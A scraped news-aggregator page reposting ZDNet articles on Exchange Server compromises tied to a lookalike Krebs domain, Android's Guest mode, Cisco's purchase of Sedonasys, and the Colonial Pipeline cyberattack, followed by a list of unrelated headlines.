Connect with us

ZDNET

Brian Krebs: No, I didn’t hack your Microsoft Exchange server

The KrebsOnSecurity name is, once again, being abused by cyberattackers.

Published

on

The KrebsOnSecurity name has been invoked in a string of cyberattacks linked to critical Microsoft Exchange Server vulnerabilities.

Security expert Brian Krebs from KrebsOnSecurity is no stranger to figures in the criminal space who appear to delight in everything from turning him into a meme, launching denial-of-service (DoS) attacks against his website, and SWATing — hoax calls made to law enforcement that not only waste police time but can also be dangerous.

Now, a domain similar to the legitimate KrebsOnSecurity security resource has been connected to threat actors exploiting a set of critical bugs in Microsoft Exchange Server.

According to a new report released by the Shadowserver Foundation, 21,248 Microsoft Exchange servers have recently been compromised that are communicating with brian[.]krebsonsecurity[.]top.

Krebs says that the compromised systems appear to have been hijacked and Babydraco backdoors are facilitating communication to the malicious domain. Web shells, used for remote access and control, are being deployed to a previously-undetected address in each case, /owa/auth/babydraco.aspx.

In addition, a malicious file named “krebsonsecurity.exe” is fetched via PowerShell to facilitate data transfers between the victim server and domain.

“The motivations of the cybercriminals behind the Krebonsecurity dot top domain are unclear, but the domain itself has a recent association with other cybercrime activity — and with harassing this author,” Krebs commented.

Microsoft released emergency patches to tackle four zero-day vulnerabilities in Exchange Server 2013, 2016, and 2019 on March 2. The security flaws can be exploited to launch remote code execution attacks and server hijacking.

A selection of mitigation tools have also been released for IT administrators who cannot immediately patch their deployments, and at last count, the Redmond giant says that roughly 92% of internet-facing Exchange servers have been either patched or mitigated.

However, just because a fix has been applied does not mean that a server has not already been targeted by threat actors and so security checks and audits also have to be conducted.

Last week, Microsoft warned of subsequent attacks following widespread Exchange server hijacking, including reconnaissance, cryptocurrency mining operations, and ransomware deployment.

“Many of the compromised systems have not yet received a secondary action, such as human-operated ransomware attacks or data exfiltration, indicating attackers could be establishing and keeping their access for potential later actions,” the company said.

The US Cybersecurity and Infrastructure Security Agency (CISA) has also issued an alert warning organizations of webshell deployment post-exploit in Exchange servers.

Microsoft has provided Indicators of Compromise (IoC) which can be found here.

Previous and related coverage

Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0

According to a new report released by the Shadowserver Foundation, 21,248 Microsoft Exchange servers have recently been compromised that are communicating with brian[.]krebsonsecurity[.]top.

Source: https://www.zdnet.com/article/brian-krebs-no-i-didnt-hack-your-microsoft-exchange-server/

brian-krebs:-no,-i-didn’t-hack-your-microsoft-exchange-server

ZDNET

A useful Android privacy feature that most people have never heard of

Android has a useful hidden feature that the iPhone doesn’t.

Published

on

Ever handed your iPhone to someone and then remembered that one thing that you don’t want them to see?

Maybe a photo, or a test, a personal message, something private from work, or your stash of cat memes you’re collecting.

Whatever it is, we carry a lot of sensitive stuff on out smartphones, and it’s only natural to what to keep that stuff private.

But the developers who work on Android have thought about this, and added a feature that allows you to be able to hand your phone to someone else, while keeping your information private.

Must read: The best Android apps for power users in 2021: Track data usage, test connections, and more

That feature is called Guest mode.

This popped into my head the other day following a conversation with an Android user who said they wished there was a way to lock their private data but still allow others to make calls and use the internet.

That’s what this mode does.

Guest mode creates a temporary account on your smartphone that is free from any of your personal information. No photos. No contacts. No messages. No files.

It also disables the phone feature, but you can choose to activate that if you want.

So, how do you access this feature? Well, it normally lives at Settings > System > Advanced > Multiple Users, but not always. If you can’t find it, a search for users should bring it up.

Guest Mode on Android

Guest Mode on Android

When you find it, you’ll see it at the bottom of the list of Google accounts tied to the handset. To switch, tap on it, and the handset will switch over.

The process is fast and only takes a few seconds.

To switch back, navigate back to Multiple Users and tap Remove Guest.

If you want to give the Guest Mode access to the phone, before going into Guest, click on the cog next to it and enable Turn on phone calls.

Guest Mode can also optionally make calls

Guest Mode can also optionally make calls

Also, for quick access, you can make this feature available from the lock screen. Handy if you use it regularly.

It’s a cool feature that helps keep your private stuff private.

That feature is called Guest mode.

Source: https://www.zdnet.com/article/a-useful-android-privacy-feature-that-most-people-have-never-heard-of/

a-useful-android-privacy-feature-that-most-people-have-never-heard-of

Continue Reading

ZDNET

Cisco to acquire Sedonasys Systems for innovative NetFusion platform

Cisco said the Sedona NetFusion platform is the first to deliver complete network abstraction and control.

Published

on

Cisco announced on Tuesday that it was acquiring Hierarchical Controller market leader Sedonasys Systems in an effort to beef up its multi-vendor, multi-domain automation, and software-defined networking offerings.

Kevin Wollenweber, vice president of product management in the Service Provider Network Systems for Cisco, explained in a blog post that in order to expand the internet and operate networks at massive scale for the billions of new users coming down the pipeline, the internet had to be reinvented in certain ways.

Cisco is acquiring Sedonasys Systems primarily for its NetFusion platform, which has a Hierarchical Controller (HCO) that it said, “enables multi-vendor, multi-domain automation, and software-defined networking.”

Wollenweber said the Sedona NetFusion platform was the first company to offer “complete network abstraction and control” that helped CSPs manage their networks across a variety of domains, vendors, layers, and technologies, all as one single network.

The addition of Sedona NetFusion to Cisco Crosswork portfolio will allow the company to offer a more advanced network automation platform for Cisco’s Routed Optical Networking Solution.

“HCO is the brain that enables transformation like 5G network slicing, routed optical networking, and disaggregation. We have one simple goal in our network automation strategy — simplification,” Wollenweber said.

“Now, CSPs can gain real-time, dynamic, and seamless control of IP and optical multi-vendor networks together. They can quickly move from clunky, manual operations across siloed teams and technologies to a completely automated and assured network that’s easily managed through a single pane of glass.”

With Cisco Crosswork and Sedona NetFusion, users will have access to a real-time replica of the entire network to predictively manage any changes to the deployment, connectivity, and activation status of all network inventory.

Operators can preview optimization, assurance, and changes, and then commit them as needed, Wollenweber added.

Source: https://www.zdnet.com/article/ciscos-to-acquire-sedonasys-systems-for-innovative-netfusion-platform/

cisco-to-acquire-sedonasys-systems-for-innovative-netfusion-platform

Continue Reading

ZDNET

Colonial Pipeline cyberattack shuts down pipeline that supplies 45% of East Coast’s fuel

The attack highlights how ransomware and other cyberattacks are increasingly a threat to real-world infrastructure.

Published

on

Colonial Pipeline, which accounts for 45% of the East Coast’s fuel, said it has shut down its operations due to a cyberattack.

The attack highlights how ransomware and other cyberattacks are increasingly a threat to real-world infrastructure. The company delivers refined petroleum products such as gasoline, diesel, jet fuel, home heating oil and fuel for the U.S. Military.

In a statement, Colonial Pipeline said:

On May 7, the Colonial Pipeline Company learned it was the victim of a cybersecurity attack. In response, we proactively took certain systems offline to contain the threat, which has temporarily halted all pipeline operations, and affected some of our IT systems. Upon learning of the issue, a leading, third-party cybersecurity firm was engaged, and they have already launched an investigation into the nature and scope of this incident, which is ongoing. We have contacted law enforcement and other federal agencies.

Colonial Pipeline is taking steps to understand and resolve this issue. At this time, our primary focus is the safe and efficient restoration of our service and our efforts to return to normal operation. This process is already underway, and we are working diligently to address this matter and to minimize disruption to our customers and those who rely on Colonial Pipeline.

Cybersecurity: Let’s get tactical | A Winning Strategy for Cybersecurity | Cyberwar and the Future of Cybersecurity

Here’s a look at the Colonial Pipeline system affected by the cyberattack.

colonial-pipeline-system-map.jpg

Colonial Pipeline’s shutdown should it continue may lead to supply shortages since it covers so much territory in the US.

Source: https://www.zdnet.com/article/colonial-pipeline-cyberattack-shuts-down-pipeline-that-supplies-45-of-east-coasts-fuel/

colonial-pipeline-cyberattack-shuts-down-pipeline-that-supplies-45%-of-east-coast's-fuel

Continue Reading

Title

Crunchbase28 mins ago

Exclusive: Forager Chews On $4M To Digitize Local Food Access

Its platform digitizes and streamlines the discovery of new local food vendors, onboarding and management of those relationships.

Blockchain news3 hours ago

Internet Computer (ICP): Everything You Need to Know

After Internet Computer ICP tokens were listed on a number of leading cryptocurrency exchanges, its price even exceeded the maximum...

Ventureburn6 hours ago

AlphaCode awards R2-million and support to fintech startups

The 10 startups, which have just completed a three-month programme, competed for one of four places in an extended 6-month...

Entrepreneur9 hours ago

7 Quick Ways to Make Money Investing $1,000

If you're shrewd, you can turn one thousand bucks into even more money. Here's how.

Bioengineer11 hours ago

NYU Abu Dhabi researchers design simulator to help stop the spread of ‘fake news’

The new game, Fakey, emulates a social media feed and teaches users to recognize credible contentCredit: Courtesy of NYU Abu

Techcrunch1 day ago

Maybe SPACs were a bad idea after all – TechCrunch

Welcome back to The TechCrunch Exchange, a weekly startups-and-markets newsletter for your weekend enjoyment.

Techcrunch1 day ago

Leveling the playing field – TechCrunch

There is an atmosphere of collaboration, not competition, around the creation of hardware for gamers within the assistive technology community.

ZDNET1 day ago

A useful Android privacy feature that most people have never heard of

Android has a useful hidden feature that the iPhone doesn't.

Coinpedia1 day ago

Polygon (Matic) Price Continues to Rise Amidst Market Correction!

The MATIC price forecasts are positive as a token supporting such a critical feature right now. After the Ethereum scaling

Reuters1 day ago

Chip shortage to hit about 100,000 Mazda vehicles in 2021

Mazda Motor Corp (7261.T) said on Friday it expects a semiconductor crunch to affect around 100,000 of the Japanese automaker's...

Review

    Select language

    Trending